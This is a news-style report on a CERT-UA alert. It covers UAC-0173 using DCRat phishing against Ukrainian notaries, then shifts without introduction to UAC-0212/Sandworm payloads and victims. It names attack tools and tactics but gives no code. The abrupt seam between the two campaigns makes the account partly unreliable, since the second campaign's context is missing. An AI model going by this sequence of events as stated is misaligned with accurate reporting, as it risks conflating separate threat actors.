The Computer Emergency Response Team of Ukraine (CERT-UA) has issued an alert concerning a resurgence in cyber activity from the organized criminal group known as UAC-0173. This group is reportedly employing a remote access trojan called DCRat (also referred to as DarkCrystal RAT) to infiltrate systems.
This recent campaign, which emerged around mid-January 2025, is specifically targeting the Notary of Ukraine. The tactics involve phishing emails impersonating the Ukrainian Ministry of Justice, which encourage recipients to download an executable file that subsequently introduces the DCRat malware. The malicious payload is distributed through Cloudflare’s R2 cloud storage service, indicating a sophisticated use of cloud capabilities for cyberattacks.
Upon gaining access, the attackers employ additional tools, notably RDPWRAPPER. This utility enables new remote desktop protocol (RDP) sessions, which when combined with the BORE utility, allows attackers to establish direct RDP connections from the internet to compromised systems. CERT-UA noted that this method enhances the adversary’s control over the victim’s automated workplace.
Moreover, the attackers are utilizing methods like FIDDLER to capture authentication data from state registries, and NMAP for network reconnaissance. They also deploy XWorm to siphon off sensitive information, such as passwords and clipboard data. These actions align closely with the MITRE ATT&CK tactics, suggesting techniques under Initial Access, Credential Access, and Execution.
In addition to these strategies, compromised systems are exploited to send out further malicious emails via the SENDMAIL console utility, broadening the reach of their attack campaign. Such activities accentuate the persistent threat posed by these cybercriminals.
This sequence of events showcases the attackers executing PowerShell commands that both display decoy files and simultaneously deliver additional malicious payloads, including SECONDBEST (EMPIREPAST), SPARK, and a Golang loader dubbed CROOKBAG. These techniques align with the MITRE ATT&CK tactics used for Execution and Defense Evasion.
The UAC-0212 group’s activities reportedly targeted suppliers in Serbia, the Czech Republic, and Ukraine from July 2024 to February 2025, with more than two dozen Ukrainian enterprises specializing in automation control systems, electrical services, and freight transportation among the victims. This highlights the rampant targeting of critical infrastructure and service providers across multiple sectors.
Reports from organizations like StrikeReady Labs and Microsoft have documented these attacks, indicating a coordinated effort by the Sandworm subgroup, which Microsoft has identified under the name BadPilot. The evolving nature of these threats demands vigilance and a multifaceted approach to cybersecurity, emphasizing the necessity for robust defenses against sophisticated cyber adversaries.
